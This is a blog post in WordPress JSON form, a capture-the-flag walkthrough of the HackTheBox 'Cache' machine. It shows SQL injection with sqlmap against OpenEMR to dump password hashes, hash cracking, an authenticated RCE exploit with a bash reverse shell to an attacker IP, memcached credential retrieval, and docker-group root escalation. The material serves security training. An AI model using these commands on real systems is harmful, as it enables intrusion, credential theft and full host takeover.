{"id":129,"date":"2020-05-17T05:48:23","date_gmt":"2020-05-17T05:48:23","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=129"},"modified":"2020-10-10T19:10:13","modified_gmt":"2020-10-10T19:10:13","slug":"cache-hackthebox-walkthrough","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/cache-hackthebox-walkthrough\/","title":{"rendered":"Cache : Hackthebox Walkthrough"},"content":{"rendered":"\n

Hey hackers! This is Shreya Pohekar and today we are walking through Cache from hackthebox.<\/p>\n\n\n\n

Summary:-<\/h3>\n\n\n\n

Cache is a medium Linux box. The initial foothold on the machine is based on a CVE of openemr which also requires a bit of enumeration to obtain creds. Escalating to the user is pretty simple as the creds to the user will be found at a very early stage. But there are 2 users on the box, each one having its importance. Escalation to root requires exploitation of docker with the help of the 2nd user who is also a member of the docker group.<\/p>\n\n\n\n

With all that said, let\u2019s get started!<\/p>\n\n\n\n

Starting with the quick port scan, I found 3 open ports<\/p>\n\n\n\n

# nmap -sC -sV -oA cache.nmap 10.10.10.188<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
In the results, I found this weird thing that SimpleHTTPServer<\/strong> is running on port 8000. After rigorous port scan on 8000, it turned out that the port is closed.(lol! False results generated by nmap)<\/p>\n\n\n\n
On moving further to http:\/\/10.10.10.188<\/a> a page loaded.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Under author.html, ash<\/strong> seemed like a probable username. Also at the bottom, there was some hospital management system. [point noted]<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Login.html landed up a page. Upon viewing its source code, there was a script functionality.js<\/strong>. It revealed the username and password to be ash<\/strong> and H@v3_fun<\/strong><\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
I used the credentials to login and got this page that was of no help. So that was the deadend. <\/p>\n\n\n\n
I also ran a gobuster scan but that too didn’t actually help.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
So wondering upon previously obtained knowledge, I realized that the hospital management system<\/strong> is the one I should have a look at. Similar to cache.htb, I made an entry to \/etc\/hosts<\/strong> specifying (since hms was author’s another project)<\/p>\n\n\n\n
10.10.10.188     hms.htb<\/p><\/blockquote>\n\n\n\n
On visiting http:\/\/hms.htb<\/a> , the following login page landed.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Upon googling I found that openemr is medical practice management software. And that 2018 OpenEmr described that the version of the software would be something that was released in 2018. And i found it to be 5.0.1<\/p>\n\n\n\n
Alongside manual enumeration, I ran a few gobuster scans to retrieve any useful information.<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u26a1 root@kali  ~\/Desktop\/htb\/cache>>  gobuster dir –url  http:\/\/hms.htb\/interface -x php  -t 50  -w \/usr\/share\/seclists\/Discovery\/Web-Content\/big.txt -q
 \/.htaccess (Status: 403) 
 \/.htaccess.php (Status: 403)
 \/.htpasswd (Status: 403)
 \/.htpasswd.php (Status: 403)
 \/billing (Status: 301)
 \/drugs (Status: 301)
 \/fax (Status: 301)
 \/forms (Status: 301)
 \/globals.php (Status: 200)
 \/index.php (Status: 200)
 \/language (Status: 301)
 \/login (Status: 301)
 \/logout.php (Status: 200)
 \/main (Status: 301)
 \/modules (Status: 301)
 \n\/new (Status: 301)
\n\/orders (Status: 301)
\n\/pic (Status: 301)
\n\/practice (Status: 301)
\n\/reports (Status: 301)
\n\/super (Status: 301)
\n\/themes (Status: 301)
\n<\/p>\n\n\n\n
 \u26a1 root@kali  ~\/Desktop\/htb\/cache>>  gobuster dir –url  http:\/\/hms.htb\/ -x php  -t 50  -w \/usr\/share\/seclists\/Discovery\/Web-Content\/big.txt -q
\n\/.htaccess (Status: 403) 
\n\/.htaccess.php (Status: 403)
\n\/.htpasswd (Status: 403)
\n\/.htpasswd.php (Status: 403)
\n\/LICENSE (Status: 200)
\n\/admin.php (Status: 200)
\n\/ci (Status: 301)
\n\/cloud (Status: 301)
\n\/common (Status: 301)
\n\/config (Status: 301)
\n\/contrib (Status: 301)
\n\/controller.php (Status: 200)
\n\/controllers (Status: 301)
\n\/custom (Status: 301)
\n\/entities (Status: 301)
\n\/images (Status: 301)
\n\/index.php (Status: 302)
\n\/interface (Status: 301)
\n\/javascript (Status: 301)
\n\/library (Status: 301)
\n\/modules (Status: 301)
\n\/myportal (Status: 301)
\n\/patients (Status: 301)
\n\/portal (Status: 301)
\n\/public (Status: 301)
\n\/repositories (Status: 301)
\n\/server-status (Status: 403)
\n\/services (Status: 301)
\n\/setup.php (Status: 200)
\n\/sites (Status: 301)
\n\/sql (Status: 301)
\n\/templates (Status: 301)
\n\/tests (Status: 301)
\n\/vendor (Status: 301)
\n\/version.php (Status: 200)
\n<\/p>\n\n\n\n
With the help of gobuster results, I was able to verify the version of openemr<\/p>\n\n\n\n
\"This<\/figure>\n\n\n\n
I searched for the available exploits for the version of openemr and found a few results. Authenticated RCE<\/strong> seemed promising but we needed some creds for the exploit to work. And the creds for ash were not working here(as he was not a valid user<\/strong>)<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
While searching for openemr exploits, I found a lot of sql injections<\/strong> possible even in the latest versions. So I spawned up sqlmap to find any creds. So I captured the request of http:\/\/hms.htb\/portal\/add_edit_event_user.php?eid=1 in burp and saved it in a file.<\/p>\n\n\n\n
Add_edit.req ( sql injection<\/a> exploits of openemr)<\/p>\n\n\n\n
\u26a1 root@kali  ~\/Desktop\/htb\/cache>>  cat add_edit.req              
\nGET \/portal\/add_edit_event_user.php?eid=1 HTTP\/1.1  
\nHost: hms.htb
\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:76.0) Gecko\/20100101 Firefox\/76.0
\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8
\nAccept-Language: en-US,en;q=0.5
\nAccept-Encoding: gzip, deflate
\nConnection: close
\nCookie: OpenEMR=k7uvoa0ide7j70sgj5s6dgohlg; PHPSESSID=85taftptj1v16u04op23b0qnml
\nUpgrade-Insecure-Requests: 1
\nCache-Control: max-age=0
\n\n<\/p>\n\n\n\n
> sqlmap -r add_edit.req --threads=10 --dbs<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
To list the tables in the database [there were 234 tables]<\/p>\n\n\n\n
> sqlmap -r add_edit.req --threads=10 -D openemr --table<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Users_secure seems promising, so lets list its columns<\/p>\n\n\n\n
>  sqlmap -r add_edit.req --threads=10 -D openemr -T users_secure --column<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Dumping the contents of users_secure<\/p>\n\n\n\n
>  sqlmap -r add_edit.req --threads=10 -D openemr -T users_secure --dump<\/pre>\n\n\n\n
| 1  | $2a$05$l2sTLIG6GTBeyBf7TAKL6A$ | openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. | 2019-11-21 06:38:40 | NULL      | NULL      | NULL          | NULL          |<\/p><\/blockquote>\n\n\n\n
I finally found the username and password hash.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Hashcat example hashes found the matching pattern for which mode to use<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
> hashcat -m 3200 openemr_admin.hash \/usr\/share\/wordlists\/rockyou.txt --force<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
The password cracked out to be xxxxxx<\/strong><\/p>\n\n\n\n
Now that we have the creds, authenticated RCE can be performed. You can grab the exploit from here<\/a>.<\/p>\n\n\n\n
Open up a ncat listener on port 1337 using (nc -lnvp 1337) and run the following command<\/p>\n\n\n\n
# python 45161.py http:\/\/hms.htb\/ -u openemr_admin -p xxxxxx -c 'bash -i >& \/dev\/tcp\/10.10.14.99\/1337 0>&1'<\/pre>\n\n\n\n
Do not forget to change the IP that corresponds to your attacking machine.<\/p>\n\n\n\n
Grabbing the user.txt<\/h3>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
And I got a shell.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
There were 2 users of which I had pass for ash, obtained earlier. I tried to su, but it was not a proper shell. <\/p>\n\n\n\n
So I ran the following commands<\/p>\n\n\n\n
# export TERM=xterm\n# python3 -c 'import pty; pty.spawn(\"\/bin\/bash\")'<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
So the user is pwned<\/strong>.<\/p>\n\n\n\n
TIme for privilege escalation.<\/h3>\n\n\n\n
After enumerating with LinEnum.sh (can be found here<\/a>), I found that there was docker running on the box<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
I tried to run the docker with ash but the permission was denied<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
So i listed the contents of \/etc\/group to see if any user is member of docker group. And yes it was user luffy.<\/p>\n\n\n\n
cat \/etc\/group
      Docker:x:999:luffy<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Therefore only luffy <\/strong>can execute the docker commands.<\/p>\n\n\n\n
Since all the commands in docker require a sudo
Being the member of docker group means the user has password-less access to root. Now the goal was to retrieve the creds of the Luffy. So I again scrolled through the results of enumeration and found out that a port 11211<\/b> was active on telnet. And that’s where Memcached<\/b> works.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
If you are unaware of the term, let me explain a bit.<\/p>\n\n\n\n
Memcached is basically an open source distributed memory caching system. It speeds up the loading of dynamic web application by reducing the load on the database. So this popular caching solution can be queried for any useful information. <\/p>\n\n\n\n
We can communicate to memcached using telnet<\/p>\n\n\n\n
> telnet 127.0.0.1 11211<\/pre>\n\n\n\n
stats items  # This command gets items statistics such as count, age, eviction, etc. organized by slabs ID<\/p><\/blockquote>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
In the output, the number after items: is the slab id (1 in my case). We can request a cache dump for each slab id, with a limit for the max number of keys to dump. This command is gonna output all the keys stored in memcached.<\/p>\n\n\n\n
>  stats cachedump 1 100<\/p><\/blockquote>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
The value of the key can be obtained with get command.<\/p>\n\n\n\n
> get user<\/p><\/blockquote>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
> get passwd #retrieves any stored password (passwd is the key)<\/p><\/blockquote>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Password : 0n3_p1ec3<\/strong><\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Now as I was logged in as luffy, I could list the docker image.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
I searched for privilege escalation with docker and found a link for GTFObins<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Since luffy is a member of docker group, running the above command directly priv esc to root.<\/p>\n\n\n\n
> docker run -v \/:\/mnt --rm -it ubuntu chroot \/mnt sh<\/pre>\n\n\n\n
-v : To bind mount a volume
 –rm : Automatically remove the container when it exits
 -it : Keep STDIN open even if not attached and Allocate a pseudo-TTY
 chroot : changes the apparent root directory for the current running process ( here to \/mnt)<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Thats all for the blog post. <\/p>\n\n\n\n
If you enjoyed reading do like the post.
\nUntil then!! Happy Hunting!!<\/p>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
Cache is medium linux box. Initial foothold is based on CVE of openEMR and privlege escalation requires exploiting the docker group member.<\/p>\n","protected":false},"author":1,"featured_media":148,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[19,2],"tags":[69,66,67,73,70,26,54,71,72,77,68,74,9,76,75],"class_list":["post-129","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","tag-authenticated-rce","tag-cache","tag-docker","tag-docker-group","tag-gtfobins","tag-hackthebox","tag-htb","tag-linux","tag-memcached","tag-openemr","tag-openemr-5-0-1","tag-sql","tag-sql-injection","tag-sql-map-database-dump","tag-sqlmap","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/129"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=129"}],"version-history":[{"count":9,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/129\/revisions"}],"predecessor-version":[{"id":521,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/129\/revisions\/521"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/148"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=129"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=129"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=129"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}